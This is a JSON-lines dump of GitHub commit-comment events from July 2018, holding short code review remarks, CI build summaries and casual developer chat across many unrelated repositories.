{"id":"7939722003","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646853,"position":69,"line":69,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/SourcePersisterFactory.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:48:10Z","updated_at":"2018-07-09T19:48:10Z","author_association":"CONTRIBUTOR","body":"Nit: not needed null-check. Kotlin will throw if `fileSystem` is null."}},"created_at":"2018-07-09T19:48:10Z"}
{"id":"7939722223","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29646854,"position":null,"line":null,"path":null,"commit_id":"e89f24afbfe291e495e801e4b00b3b58d1f6ced2","created_at":"2018-07-09T19:48:12Z","updated_at":"2018-07-09T19:48:12Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-34](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T19:48:12Z"}
{"id":"7939722394","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29646855,"position":null,"line":null,"path":null,"commit_id":"363cb07cbc952e154f65173c9eb5455e4107dc41","created_at":"2018-07-09T19:48:14Z","updated_at":"2018-07-09T19:48:14Z","author_association":"COLLABORATOR","body":"Yes, please check the manual before you make changes.  For the time being, we want the manual version, the stable version and the generated versions to match.  Any difference could be important, so if you see the manual version differs in some way, please check before ignoring the difference.\r\n\r\nHopefully the yuzhi branch will be merged soon.  I only really look at the master branch, so at times we might be looking at different things."}},"created_at":"2018-07-09T19:48:14Z"}
{"id":"7939722431","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646856,"position":83,"line":83,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/SourcePersisterFactory.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:48:14Z","updated_at":"2018-07-09T19:48:14Z","author_association":"CONTRIBUTOR","body":"Nit: not needed null-check. Kotlin will throw if `root` is null."}},"created_at":"2018-07-09T19:48:14Z"}
{"id":"7939723155","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646859,"position":94,"line":94,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/SourcePersisterFactory.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:48:23Z","updated_at":"2018-07-09T19:48:23Z","author_association":"CONTRIBUTOR","body":"Nit: not needed null-check. Kotlin will throw if `fileSystem` is null."}},"created_at":"2018-07-09T19:48:23Z"}
{"id":"7939724072","type":"CommitCommentEvent","actor":{"login":"DSchau"},"repo":{"name":"DSchau/gatsby-blog-starter-kit"},"payload":{"comment":{"id":29646862,"position":null,"line":null,"path":null,"commit_id":"a7c99779390eba9db10d6f1255e6f90beeb0b444","created_at":"2018-07-09T19:48:35Z","updated_at":"2018-07-09T19:48:35Z","author_association":"OWNER","body":"Build failed! Should have a fix in https://github.com/DSchau/gatsby-blog-starter-kit/pull/34"}},"created_at":"2018-07-09T19:48:35Z"}
{"id":"7939726991","type":"CommitCommentEvent","actor":{"login":"DSchau"},"repo":{"name":"DSchau/gatsby-blog-starter-kit"},"payload":{"comment":{"id":29646867,"position":null,"line":null,"path":null,"commit_id":"a7c99779390eba9db10d6f1255e6f90beeb0b444","created_at":"2018-07-09T19:49:15Z","updated_at":"2018-07-09T19:49:15Z","author_association":"OWNER","body":"🤞 "}},"created_at":"2018-07-09T19:49:15Z"}
{"id":"7939732848","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646881,"position":18,"line":18,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/ObjectToSourceTransformer.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:50:28Z","updated_at":"2018-07-09T19:50:28Z","author_association":"CONTRIBUTOR","body":"You can omit `object` and just write `.map { adapter.toJson(it) }` I think :) "}},"created_at":"2018-07-09T19:50:28Z"}
{"id":"7939734033","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29646885,"position":null,"line":null,"path":null,"commit_id":"a485b301dc5b022dd9d603d442c229602e8feb65","created_at":"2018-07-09T19:50:43Z","updated_at":"2018-07-09T19:50:43Z","author_association":"COLLABORATOR","body":"Uh oh. Ignore this commit! I forgot to add the new files to the git!"}},"created_at":"2018-07-09T19:50:43Z"}
{"id":"7939737445","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646890,"position":30,"line":30,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/RecordPersisterFactory.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:51:24Z","updated_at":"2018-07-09T19:51:24Z","author_association":"CONTRIBUTOR","body":"Nit: not needed null-check. Kotlin will throw if `root` is null."}},"created_at":"2018-07-09T19:51:24Z"}
{"id":"7939737603","type":"CommitCommentEvent","actor":{"login":"blaggacao"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29646891,"position":null,"line":null,"path":null,"commit_id":"02b38ef8a4abb0abc41a202a359c6d0aa2a925e7","created_at":"2018-07-09T19:51:25Z","updated_at":"2018-07-09T19:51:25Z","author_association":"CONTRIBUTOR","body":"Ahaaa :+1:  `# missing sane on several arches` subtle... As it's not in here..."}},"created_at":"2018-07-09T19:51:25Z"}
{"id":"7939738120","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646893,"position":43,"line":43,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/RecordPersisterFactory.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:51:32Z","updated_at":"2018-07-09T19:51:32Z","author_association":"CONTRIBUTOR","body":"Nit: not needed null-check. Kotlin will throw if `fileSystem` is null."}},"created_at":"2018-07-09T19:51:32Z"}
{"id":"7939744672","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646902,"position":19,"line":19,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/SourceAllPersister.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:52:54Z","updated_at":"2018-07-09T19:52:54Z","author_association":"CONTRIBUTOR","body":"Not sure if these variables had package-level visibility previously in purpose, but `internal` here will give them module-level visibility. Might worth checking what the backing business logic behind them is :)"}},"created_at":"2018-07-09T19:52:54Z"}
{"id":"7939746266","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646905,"position":25,"line":25,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/SourcePersister.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:53:13Z","updated_at":"2018-07-09T19:53:13Z","author_association":"CONTRIBUTOR","body":"Same for the visibility of those as well :)"}},"created_at":"2018-07-09T19:53:13Z"}
{"id":"7939752389","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29646916,"position":null,"line":null,"path":null,"commit_id":"96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013","created_at":"2018-07-09T19:54:33Z","updated_at":"2018-07-09T19:54:33Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - Win64-Windows-7-VisualStudio-14: Build Failed\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 3 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 299\n * Failed: 326\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-96ad8c86bd29641f7ba2dd8e0f9b4c51d4476013-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-57.47%25-red.png)</a> \n"}},"created_at":"2018-07-09T19:54:33Z"}
{"id":"7939752806","type":"CommitCommentEvent","actor":{"login":"DanielRuf"},"repo":{"name":"DSchau/gatsby-blog-starter-kit"},"payload":{"comment":{"id":29646918,"position":null,"line":null,"path":null,"commit_id":"b27f464011084a0348cb7393dc1603fa625b89e0","created_at":"2018-07-09T19:54:38Z","updated_at":"2018-07-09T19:54:38Z","author_association":"CONTRIBUTOR","body":"![github com_dschau_gatsby-blog-starter-kit](https://user-images.githubusercontent.com/827205/42472721-a6a5aea2-83c2-11e8-8343-dd26fb8440df.png)\r\n\r\n🎉 "}},"created_at":"2018-07-09T19:54:38Z"}
{"id":"7939756128","type":"CommitCommentEvent","actor":{"login":"Sekva"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29646928,"position":null,"line":null,"path":null,"commit_id":"5b4a64c87cf7f5a2956b05d10c2211e31c45f378","created_at":"2018-07-09T19:55:19Z","updated_at":"2018-07-09T19:55:19Z","author_association":"OWNER","body":"lknhbsg"}},"created_at":"2018-07-09T19:55:19Z"}
{"id":"7939756674","type":"CommitCommentEvent","actor":{"login":"acdameli"},"repo":{"name":"stagebloc/Crontab"},"payload":{"comment":{"id":29646929,"position":5,"line":139,"path":"src/Crontab/Job.php","commit_id":"639e0077520219305b0a560debf2ecb43d0d0a1f","created_at":"2018-07-09T19:55:26Z","updated_at":"2018-07-09T19:55:26Z","author_association":"MEMBER","body":"This breaks parsing the rendered crontab [here](https://github.com/stagebloc/Crontab/commit/639e0077520219305b0a560debf2ecb43d0d0a1f#diff-4513447688de2c87f8336d84e5eeab50R53)"}},"created_at":"2018-07-09T19:55:26Z"}
{"id":"7939757077","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646930,"position":48,"line":48,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/SourcePersister.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:55:30Z","updated_at":"2018-07-09T19:55:30Z","author_association":"CONTRIBUTOR","body":"Can be written as: `internal fun pathForBarcode(barCode: BarCode) = \"${barCode.type}${barCode.key}\"` utilizing String interpolation of Kotlin :)"}},"created_at":"2018-07-09T19:55:30Z"}
{"id":"7939758698","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29646935,"position":null,"line":null,"path":null,"commit_id":"e5f5d426a8687ee9095caf199602c991ab1ad5a0","created_at":"2018-07-09T19:55:51Z","updated_at":"2018-07-09T19:55:51Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |      0.1 |\n| `metadata_passing` |      1   |\n| `metadata_total`   |      1   |\n| `nodes_count`      |     19   |\n| `texts_passing`    |      3   |\n| `texts_total`      |      3   |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `eng`     |    +3909 |\n| `grc`     |    +1257 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0007/tlg074/__cts__.xml`                     | New      |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng3.xml` | New      |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng4.xml` | New      |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-grc2.xml` | New      |\n| `./data/tlg0007/tlg074/__cts__.xml`                     | Passing  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng3.xml` | Passing  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-eng4.xml` | Passing  |\n| `./data/tlg0007/tlg074/tlg0007.tlg074.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4427)*\n"}},"created_at":"2018-07-09T19:55:51Z"}
{"id":"7939760089","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29646936,"position":null,"line":null,"path":null,"commit_id":"5b4087b439d371a04449ccd84fcc85b3f5591df3","created_at":"2018-07-09T19:56:07Z","updated_at":"2018-07-09T19:56:07Z","author_association":"NONE","body":"FYI If ttHit is false ttValue will be incorrect."}},"created_at":"2018-07-09T19:56:07Z"}
{"id":"7939761255","type":"CommitCommentEvent","actor":{"login":"khalifagates"},"repo":{"name":"khalifagates/vlcqml2"},"payload":{"comment":{"id":29646937,"position":1,"line":1,"path":"modules/codec/webvtt/CSSGrammar.h","commit_id":"b6fcbb7166e5e66720c98eb845efc39c4bf004e8","created_at":"2018-07-09T19:56:21Z","updated_at":"2018-07-09T19:56:21Z","author_association":"OWNER","body":"Yeah i will remove them. I think that is why repo is large. Thanks."}},"created_at":"2018-07-09T19:56:21Z"}
{"id":"7939761769","type":"CommitCommentEvent","actor":{"login":"acdameli"},"repo":{"name":"stagebloc/Crontab"},"payload":{"comment":{"id":29646939,"position":5,"line":139,"path":"src/Crontab/Job.php","commit_id":"639e0077520219305b0a560debf2ecb43d0d0a1f","created_at":"2018-07-09T19:56:28Z","updated_at":"2018-07-09T19:56:28Z","author_association":"MEMBER","body":"@PortNumber53 I also think the way we're disabling these jobs also probably breaks the parsing."}},"created_at":"2018-07-09T19:56:28Z"}
{"id":"7939763611","type":"CommitCommentEvent","actor":{"login":"MBaltz"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29646940,"position":null,"line":null,"path":null,"commit_id":"5b4a64c87cf7f5a2956b05d10c2211e31c45f378","created_at":"2018-07-09T19:56:51Z","updated_at":"2018-07-09T19:56:51Z","author_association":"COLLABORATOR","body":"konjh32h42urfijwef"}},"created_at":"2018-07-09T19:56:51Z"}
{"id":"7939765603","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29646942,"position":null,"line":null,"path":null,"commit_id":"657b9bf38384d56c896f74beeab7ade2472e1960","created_at":"2018-07-09T19:57:17Z","updated_at":"2018-07-09T19:57:17Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2745 of 2933 tests passed, 86 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 222 tests had: EIO diffs.\n * 76 tests had: ESO big diffs.\n * 174 tests had: Table big diffs.\n * 166 tests had: ESO small diffs.\n * 99 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 40 tests had: Table small diffs.\n * 16 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 435\n * Failed: 188\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.59%25-yellow.png)</a> \n"}},"created_at":"2018-07-09T19:57:17Z"}
{"id":"7939770396","type":"CommitCommentEvent","actor":{"login":"diplozoon"},"repo":{"name":"Kyomunymous-Dev/Kyomunymous-v2"},"payload":{"comment":{"id":29646954,"position":null,"line":null,"path":null,"commit_id":"96c09e370cce83104ea2d6843c89a847fe9e68a6","created_at":"2018-07-09T19:58:13Z","updated_at":"2018-07-09T19:58:13Z","author_association":"CONTRIBUTOR","body":"#9"}},"created_at":"2018-07-09T19:58:13Z"}
{"id":"7939771344","type":"CommitCommentEvent","actor":{"login":"pipermerriam"},"repo":{"name":"ethereum/py-evm"},"payload":{"comment":{"id":29646957,"position":92,"line":567,"path":"p2p/chain.py","commit_id":"f80d8ba0708137fee153b860f2b94fb75b17b267","created_at":"2018-07-09T19:58:25Z","updated_at":"2018-07-09T19:58:25Z","author_association":"MEMBER","body":"Curious why this wasn't inlined in the large `if/elif/...` block on lines 485-500 the same way that the `NodeData` warning is being logged."}},"created_at":"2018-07-09T19:58:25Z"}
{"id":"7939776624","type":"CommitCommentEvent","actor":{"login":"pipermerriam"},"repo":{"name":"ethereum/py-evm"},"payload":{"comment":{"id":29646966,"position":35,"line":500,"path":"p2p/chain.py","commit_id":"f80d8ba0708137fee153b860f2b94fb75b17b267","created_at":"2018-07-09T19:59:32Z","updated_at":"2018-07-09T19:59:32Z","author_association":"MEMBER","body":"Should we also disconnect from the peer?  Otherwise a malicious peer can create some major terminal spam by triggering this repeatedly."}},"created_at":"2018-07-09T19:59:32Z"}
{"id":"7939777482","type":"CommitCommentEvent","actor":{"login":"rnalrd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29646967,"position":null,"line":null,"path":null,"commit_id":"02b38ef8a4abb0abc41a202a359c6d0aa2a925e7","created_at":"2018-07-09T19:59:44Z","updated_at":"2018-07-09T19:59:44Z","author_association":"CONTRIBUTOR","body":"You are welcome to send a patch/PR to get sane built for armhf... :smile: "}},"created_at":"2018-07-09T19:59:44Z"}
{"id":"7935016923","type":"CommitCommentEvent","actor":{"login":"hillfolk"},"repo":{"name":"tireDep/makeProject"},"payload":{"comment":{"id":29635770,"position":55,"line":63,"path":"Assets/Scripts/Game.cs","commit_id":"e6aa24bef5e7a1d5e2562bddeaac311df9ea6ea6","created_at":"2018-07-09T02:00:04Z","updated_at":"2018-07-09T02:00:04Z","author_association":"NONE","body":"y 라는 변수는 x,y 와 같이 좌표로 사용하면서 index 값 으로 중복 사용이 많아서 코드 읽기가 힘드네요. \r\n"}},"created_at":"2018-07-09T02:00:04Z"}
{"id":"7935017198","type":"CommitCommentEvent","actor":{"login":"shengxia-xl"},"repo":{"name":"shengxia-xl/ToolRepository"},"payload":{"comment":{"id":29635771,"position":null,"line":null,"path":null,"commit_id":"a11bb4c159f6f1d8ff447cef6c83326e04682067","created_at":"2018-07-09T02:00:10Z","updated_at":"2018-07-09T02:00:10Z","author_association":"OWNER","body":"更新点：\r\n1、增加基本数据类型大小的计算\r\n2、增加结构体大小的计算(函数，静态成员，空结构体等)"}},"created_at":"2018-07-09T02:00:10Z"}
{"id":"7935018412","type":"CommitCommentEvent","actor":{"login":"hillfolk"},"repo":{"name":"tireDep/makeProject"},"payload":{"comment":{"id":29635780,"position":55,"line":63,"path":"Assets/Scripts/Game.cs","commit_id":"e6aa24bef5e7a1d5e2562bddeaac311df9ea6ea6","created_at":"2018-07-09T02:00:36Z","updated_at":"2018-07-09T02:00:36Z","author_association":"NONE","body":"함수 명 같은 경우는 이해 하기 쉽게 잘쓰시는 것 같아요\r\n"}},"created_at":"2018-07-09T02:00:36Z"}
{"id":"7935020342","type":"CommitCommentEvent","actor":{"login":"gbcaptain"},"repo":{"name":"gbcaptain/GoogleInterviewQuestion_Coding"},"payload":{"comment":{"id":29635783,"position":null,"line":null,"path":null,"commit_id":"f9f67dea7ee1924d77dbd93d107fb5d7dc8a348b","created_at":"2018-07-09T02:01:21Z","updated_at":"2018-07-09T02:01:21Z","author_association":"OWNER","body":"Implement an algorithm to determine if a string has all unique characters. What if you can not use additional data structures?"}},"created_at":"2018-07-09T02:01:21Z"}
{"id":"7935021639","type":"CommitCommentEvent","actor":{"login":"hillfolk"},"repo":{"name":"tireDep/makeProject"},"payload":{"comment":{"id":29635784,"position":null,"line":null,"path":null,"commit_id":"e04f2310a072d1fd3d80712b36ef9feda653cca4","created_at":"2018-07-09T02:01:55Z","updated_at":"2018-07-09T02:01:55Z","author_association":"NONE","body":"log 같은 경우도 git 에 올라오지 않도록 빼주시는게 좋아요."}},"created_at":"2018-07-09T02:01:55Z"}
{"id":"7935024083","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29635788,"position":5,"line":106,"path":"src/Disco/AST/Core.hs","commit_id":"5c3733123b26d91d0ae3efe980d07c3dcdbc178e","created_at":"2018-07-09T02:02:56Z","updated_at":"2018-07-09T02:02:56Z","author_association":"MEMBER","body":"We should be able to get rid of `OPosSub` now. (That was the old version that crashed if you subtracted a bigger number from smaller.)"}},"created_at":"2018-07-09T02:02:56Z"}
{"id":"7935024276","type":"CommitCommentEvent","actor":{"login":"younis-hamalawy"},"repo":{"name":"Muuuchem/awakens"},"payload":{"comment":{"id":29635789,"position":null,"line":null,"path":null,"commit_id":"8e8e4e7cdc6d259efa00e351726252952d959e56","created_at":"2018-07-09T02:03:00Z","updated_at":"2018-07-09T02:03:00Z","author_association":"COLLABORATOR","body":"tyler's merge"}},"created_at":"2018-07-09T02:03:00Z"}
{"id":"7935025703","type":"CommitCommentEvent","actor":{"login":"polyzen"},"repo":{"name":"tdryer/hangups"},"payload":{"comment":{"id":29635790,"position":null,"line":null,"path":null,"commit_id":"71977d0f66a7826a5f02818bb3092455d3cafe30","created_at":"2018-07-09T02:03:35Z","updated_at":"2018-07-09T02:03:35Z","author_association":"CONTRIBUTOR","body":"Could a new release be made for this?"}},"created_at":"2018-07-09T02:03:35Z"}
{"id":"7935027278","type":"CommitCommentEvent","actor":{"login":"hillfolk"},"repo":{"name":"howoo101/makeboard"},"payload":{"comment":{"id":29635792,"position":39,"line":39,"path":"src/main/java/com/springbook/biz/user/UserVO.java","commit_id":"73cac974e35dccc6730c2b6925c5bcd7cfa0baeb","created_at":"2018-07-09T02:04:15Z","updated_at":"2018-07-09T02:04:15Z","author_association":"NONE","body":"해당 프로젝트의 데이터베이스 구축 내용이 궁금하네요.\r\nReadme.md 파일에 데이터 베이스 구축 내용을 올려 주면 좋을것 같습니다. "}},"created_at":"2018-07-09T02:04:15Z"}
{"id":"7935030627","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29635796,"position":23,"line":138,"path":"src/Disco/AST/Core.hs","commit_id":"5c3733123b26d91d0ae3efe980d07c3dcdbc178e","created_at":"2018-07-09T02:05:47Z","updated_at":"2018-07-09T02:05:47Z","author_association":"MEMBER","body":"We should not need an `OMSSub`.  I'm not sure saturating subtraction really makes sense for modular arithmetic."}},"created_at":"2018-07-09T02:05:47Z"}
{"id":"7935030843","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635799,"position":null,"line":null,"path":null,"commit_id":"631dd7a4e974547b9ff483401e5256fa5aa3797e","created_at":"2018-07-09T02:05:54Z","updated_at":"2018-07-09T02:05:54Z","author_association":"MEMBER","body":"@sambayless https://github.com/NixOS/nixpkgs/commit/1dd7bc7dfcd3e6d3529f5436b3d5aecf6c3fe74c 😄"}},"created_at":"2018-07-09T02:05:54Z"}
{"id":"7935036590","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29635807,"position":4,"line":54,"path":"src/Disco/Syntax/Operators.hs","commit_id":"5c3733123b26d91d0ae3efe980d07c3dcdbc178e","created_at":"2018-07-09T02:08:37Z","updated_at":"2018-07-09T02:08:37Z","author_association":"MEMBER","body":"We shouldn't need a `PosSub` here, unless you were thinking about adding special syntax for the version of subtraction that throws an error when it underflows?"}},"created_at":"2018-07-09T02:08:37Z"}
{"id":"7935037405","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29635809,"position":null,"line":null,"path":null,"commit_id":"8a25edf2cce915f04319139aa7b898d3737c390c","created_at":"2018-07-09T02:09:02Z","updated_at":"2018-07-09T02:09:02Z","author_association":"MEMBER","body":"btw i recommend u build with relwithdebinfo and run in gdb so we can track possible server crash"}},"created_at":"2018-07-09T02:09:02Z"}
{"id":"7935038813","type":"CommitCommentEvent","actor":{"login":"tonyyyye"},"repo":{"name":"tonyyyye/shadowverse"},"payload":{"comment":{"id":29635812,"position":null,"line":null,"path":null,"commit_id":"1757e7651ed86e0965c6682ff6460db2e7e0cdb2","created_at":"2018-07-09T02:09:45Z","updated_at":"2018-07-09T02:09:45Z","author_association":"OWNER","body":"in pm6 we don't need 'use lib;'"}},"created_at":"2018-07-09T02:09:45Z"}
{"id":"7935040681","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"dev-harsh1998/android_device_lenovo_a6000"},"payload":{"comment":{"id":29635816,"position":null,"line":null,"path":null,"commit_id":"9798a20c870d0b64ea47c03e8bd966986705fd3b","created_at":"2018-07-09T02:10:34Z","updated_at":"2018-07-09T02:10:34Z","author_association":"NONE","body":"Does this need anything from stock??\r\nOr it is dependent upon stock ??\r\n\r\n"}},"created_at":"2018-07-09T02:10:34Z"}
{"id":"7935041606","type":"CommitCommentEvent","actor":{"login":"bowshanks"},"repo":{"name":"mangostein/home-service"},"payload":{"comment":{"id":29635817,"position":4,"line":4,"path":"src/server.js","commit_id":"9d7f55c8a6bc052bb5570f5cf0d24446c27d6d10","created_at":"2018-07-09T02:11:02Z","updated_at":"2018-07-09T02:11:02Z","author_association":"CONTRIBUTOR","body":"express was required on already below `let app = require(express)();`\r\ndo we want it twice"}},"created_at":"2018-07-09T02:11:02Z"}
{"id":"7935042045","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29635819,"position":null,"line":null,"path":null,"commit_id":"603840139174110eb25d1e36162781fb966fb0d9","created_at":"2018-07-09T02:11:14Z","updated_at":"2018-07-09T02:11:14Z","author_association":"NONE","body":"your stock rom supports it??\r\n\r\nGive me your tg username"}},"created_at":"2018-07-09T02:11:14Z"}
{"id":"7935043863","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29635821,"position":23,"line":138,"path":"src/Disco/AST/Core.hs","commit_id":"5c3733123b26d91d0ae3efe980d07c3dcdbc178e","created_at":"2018-07-09T02:12:05Z","updated_at":"2018-07-09T02:12:05Z","author_association":"MEMBER","body":"Well, maybe it does. I guess we do have `<` defined on `Zn`."}},"created_at":"2018-07-09T02:12:05Z"}
{"id":"7935044278","type":"CommitCommentEvent","actor":{"login":"JohnMH"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29635822,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-09T02:12:15Z","updated_at":"2018-07-09T02:12:15Z","author_association":"OWNER","body":"@albfan I've also switched to GitLab, which is why this is not a high priority for me."}},"created_at":"2018-07-09T02:12:15Z"}
{"id":"7935045743","type":"CommitCommentEvent","actor":{"login":"JohnMH"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29635826,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-09T02:12:53Z","updated_at":"2018-07-09T02:12:53Z","author_association":"OWNER","body":"Additionally, I will not be pushing any further commits for any software to GitHub."}},"created_at":"2018-07-09T02:12:53Z"}
{"id":"7935046899","type":"CommitCommentEvent","actor":{"login":"sambayless"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635828,"position":null,"line":null,"path":null,"commit_id":"631dd7a4e974547b9ff483401e5256fa5aa3797e","created_at":"2018-07-09T02:13:24Z","updated_at":"2018-07-09T02:13:24Z","author_association":"NONE","body":"\"Any thoughts on patching the .dylib/.so locations?\"\r\nI'm not sure what the right thing to do about that is. My current solution is kludgy, and doesn't work with out-of-source builds. Maybe a better solution would be to have cmake interact with or configure the setup.py installation, to inform it of the location of the shared library. But I'm not sure how to do that cleanly.\r\n\r\nAlternatively, cmake could perform the python installation itself (eg, https://bloerg.net/2012/11/10/cmake-and-distutils.html). That is similar to what I do for Java.\r\n\r\nOr I could use an environment variable to control the installation directory in setup.py, but I'm worried that it may lead to confusing errors down the line (if users set that variable, and then forget about it). \r\n\r\nFor now, your solution is fine."}},"created_at":"2018-07-09T02:13:24Z"}
{"id":"7935047853","type":"CommitCommentEvent","actor":{"login":"duderamos"},"repo":{"name":"lucascaton/dotfiles"},"payload":{"comment":{"id":29635830,"position":4,"line":121,"path":"files/zshrc","commit_id":"e80a90ad799fbda885e78f1692723f5fe9059b71","created_at":"2018-07-09T02:13:50Z","updated_at":"2018-07-09T02:13:50Z","author_association":"NONE","body":"Rely only on `awk`:\r\n\r\n```shell\r\ngit status --porcelain | awk '$1 ~ /A|M/ && $NF ~ /\\.rb$/ { print $NF }' | xargs rubocop --force-exclusion\r\n```"}},"created_at":"2018-07-09T02:13:50Z"}
